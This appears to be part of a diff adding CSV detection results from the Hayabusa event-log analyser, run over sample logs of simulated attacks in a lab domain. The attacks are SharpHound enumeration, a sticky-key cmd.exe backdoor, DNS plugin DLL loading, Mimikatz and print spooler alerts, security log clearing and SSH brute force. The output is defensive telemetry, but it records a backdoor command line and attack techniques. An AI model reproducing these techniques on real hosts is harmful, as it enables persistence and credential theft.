+2021-05-03 17:58:25.921 +09:00,atanids01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 62173  :  LogonID: 0x88f313a8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:25.942 +09:00,atanids01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 62188  :  LogonID: 0x88f3141d,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:25.949 +09:00,atanids01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 62190  :  LogonID: 0x88f31435,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:25.950 +09:00,atanids01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 62194  :  LogonID: 0x88f31447,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.674 +09:00,dhcp01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 62169  :  LogonID: 0x61e27259,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.677 +09:00,wsus01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 62167  :  LogonID: 0x5a4cc2f1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.679 +09:00,exchange01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 62170  :  LogonID: 0xbe8573e4,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.685 +09:00,dhcp01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 62182  :  LogonID: 0x61e27296,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.686 +09:00,wsus01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 62175  :  LogonID: 0x5a4cc329,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.686 +09:00,dhcp01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 62178  :  LogonID: 0x61e272a9,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.687 +09:00,wsus01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 62179  :  LogonID: 0x5a4cc34a,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.687 +09:00,exchange01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 62180  :  LogonID: 0xbe857415,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.688 +09:00,exchange01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 62184  :  LogonID: 0xbe85742e,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.689 +09:00,pki01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 62168  :  LogonID: 0x22c8a454,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.689 +09:00,atacore01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 62172  :  LogonID: 0x3a7fd720,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.689 +09:00,wsus01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 62183  :  LogonID: 0x5a4cc36c,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.690 +09:00,dhcp01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 62187  :  LogonID: 0x61e272d5,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.691 +09:00,exchange01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 62186  :  LogonID: 0xbe857459,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.712 +09:00,atacore01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 62189  :  LogonID: 0x3a7fd78b,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.713 +09:00,atacore01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 62193  :  LogonID: 0x3a7fd7a6,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.713 +09:00,pki01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 62192  :  LogonID: 0x22c8a4c2,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.714 +09:00,atacore01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 62191  :  LogonID: 0x3a7fd7ba,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.715 +09:00,pki01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 62195  :  LogonID: 0x22c8a4dc,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.718 +09:00,pki01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 62196  :  LogonID: 0x22c8a4f7,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.722 +09:00,mssql01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 62197  :  LogonID: 0x2a1f27d0,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.733 +09:00,mssql01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 62198  :  LogonID: 0x2a1f27f0,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.734 +09:00,mssql01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 62199  :  LogonID: 0x2a1f2809,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.735 +09:00,mssql01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 62200  :  LogonID: 0x2a1f281b,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.742 +09:00,prtg-mon.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 62211  :  LogonID: 0x222004fb,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.742 +09:00,webiis01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 62209  :  LogonID: 0x258b9e7c,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.752 +09:00,prtg-mon.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 62219  :  LogonID: 0x22200531,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.753 +09:00,prtg-mon.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 62222  :  LogonID: 0x2220054d,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.753 +09:00,prtg-mon.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 62223  :  LogonID: 0x22200565,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.762 +09:00,adfs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 62210  :  LogonID: 0x213dfbef,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.762 +09:00,fs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 62208  :  LogonID: 0x28da8a22,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.771 +09:00,adfs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 62218  :  LogonID: 0x213dfc1c,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.771 +09:00,fs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 62216  :  LogonID: 0x28da8a5a,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.772 +09:00,fs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 62217  :  LogonID: 0x28da8a76,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.773 +09:00,fs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 62220  :  LogonID: 0x28da8a88,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.773 +09:00,adfs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 62221  :  LogonID: 0x213dfc3f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.773 +09:00,adfs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 62224  :  LogonID: 0x213dfc4d,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.774 +09:00,webiis01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 62234  :  LogonID: 0x258b9ee5,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.775 +09:00,webiis01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 62235  :  LogonID: 0x258b9ef8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.775 +09:00,webiis01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 62236  :  LogonID: 0x258b9efd,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 21:06:57.954 +09:00,win10-02.offsec.lan,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1059,technique_name=Command-Line Interface  :  Command: C:\windows\system32\cmd.exe sethc.exe 211  :  Path: C:\Windows\System32\cmd.exe  :  User: OFFSEC\admmig  :  Parent Command: winlogon.exe",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID1-CMD executed via sticky key call.evtx
+2021-05-03 21:06:57.954 +09:00,win10-02.offsec.lan,1,critical,Sticky Key Like Backdoor Usage,,rules/sigma/process_creation/process_creation_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID1-CMD executed via sticky key call.evtx
+2021-05-15 05:39:33.214 +09:00,fs01.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-4697 RDP hijack via service creation.evtx
+2021-05-19 06:18:40.607 +09:00,rootdc1.offsec.lan,150,critical,DNS Server Error Failed Loading the ServerLevelPluginDLL,,rules/sigma/other/dns_server/win_susp_dns_config.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx
+2021-05-19 06:18:40.607 +09:00,rootdc1.offsec.lan,150,high,Possible CVE-2021-1675 Print Spooler Exploitation,,rules/sigma/other/printservice/win_exploit_cve_2021_1675_printspooler.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx
+2021-05-19 06:18:40.607 +09:00,rootdc1.offsec.lan,150,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx
+2021-05-19 06:23:27.038 +09:00,rootdc1.offsec.lan,150,critical,DNS Server Error Failed Loading the ServerLevelPluginDLL,,rules/sigma/other/dns_server/win_susp_dns_config.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx
+2021-05-19 06:23:27.038 +09:00,rootdc1.offsec.lan,150,high,Possible CVE-2021-1675 Print Spooler Exploitation,,rules/sigma/other/printservice/win_exploit_cve_2021_1675_printspooler.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx
+2021-05-19 06:23:27.038 +09:00,rootdc1.offsec.lan,150,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx
+2021-05-19 06:30:17.318 +09:00,rootdc1.offsec.lan,4688,high,Possible CVE-2021-1675 Print Spooler Exploitation,,rules/sigma/other/printservice/win_exploit_cve_2021_1675_printspooler.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID4688-DNS DLL serverlevelplugindll command.evtx
+2021-05-19 06:30:17.318 +09:00,rootdc1.offsec.lan,4688,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID4688-DNS DLL serverlevelplugindll command.evtx
+2021-05-19 06:30:17.318 +09:00,rootdc1.offsec.lan,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID4688-DNS DLL serverlevelplugindll command.evtx
+2021-05-19 06:33:49.548 +09:00,rootdc1.offsec.lan,770,critical,DNS Server Error Failed Loading the ServerLevelPluginDLL,,rules/sigma/other/dns_server/win_susp_dns_config.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID770-Success DLL loaded by DNS server.evtx
+2021-05-19 06:33:49.548 +09:00,rootdc1.offsec.lan,770,high,Possible CVE-2021-1675 Print Spooler Exploitation,,rules/sigma/other/printservice/win_exploit_cve_2021_1675_printspooler.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID770-Success DLL loaded by DNS server.evtx
+2021-05-19 06:33:49.548 +09:00,rootdc1.offsec.lan,770,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID770-Success DLL loaded by DNS server.evtx
+2021-05-19 06:33:49.548 +09:00,rootdc1.offsec.lan,770,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID770-Success DLL loaded by DNS server.evtx
+2021-05-20 21:49:31.863 +09:00,fs01.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx
+2021-05-20 21:49:46.875 +09:00,fs01.offsec.lan,4648,informational,Explicit Logon,Source User: FS01$  :  Target User: sshd_5848  :  IP Address: -  :  Process: C:\Program Files\OpenSSH-Win64\sshd.exe  :  Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx
+2021-05-20 21:49:46.876 +09:00,fs01.offsec.lan,4624,low,Logon Type 5 - Service,User: sshd_5848  :  Workstation: -  :  IP Address: -  :  Port: -  :  LogonID: 0x3c569ed,rules/hayabusa/default/events/Security/Logons/4624_LogonType-5-Service.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx
+2021-05-20 21:49:46.876 +09:00,fs01.offsec.lan,4672,informational,Admin Logon,User: sshd_5848  :  LogonID: 0x3c569ed,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx
+2021-05-20 21:49:52.315 +09:00,fs01.offsec.lan,4776,informational,NTLM Logon to Local Account,User: NOUSER  :  Workstation FS01  :  Status: 0xc0000064,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx
+2021-05-20 21:49:52.315 +09:00,fs01.offsec.lan,4625,informational,Logon Failure - Username does not exist,User: NOUSER  :  Type: 8  :  Workstation: FS01  :  IP Address: -  :  SubStatus: 0xc0000064  :  AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongUsername.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx
+2021-05-20 21:49:52.315 +09:00,-,-,medium,User Guessing Attempt,[condition] count() by IpAddress >= 5 in timeframe [result] count:5 IpAddress:- timeframe:5m,rules/hayabusa/default/alerts/Security/4625_BruteForce_UserGuessingDetect.yml,-
+2021-05-20 21:49:53.378 +09:00,fs01.offsec.lan,4776,informational,NTLM Logon to Local Account,User: NOUSER  :  Workstation FS01  :  Status: 0xc0000064,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx
+2021-05-20 21:49:53.378 +09:00,fs01.offsec.lan,4625,informational,Logon Failure - Username does not exist,User: NOUSER  :  Type: 8  :  Workstation: FS01  :  IP Address: -  :  SubStatus: 0xc0000064  :  AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongUsername.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx
+2021-05-20 21:49:54.043 +09:00,fs01.offsec.lan,4776,informational,NTLM Logon to Local Account,User: NOUSER  :  Workstation FS01  :  Status: 0xc0000064,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx
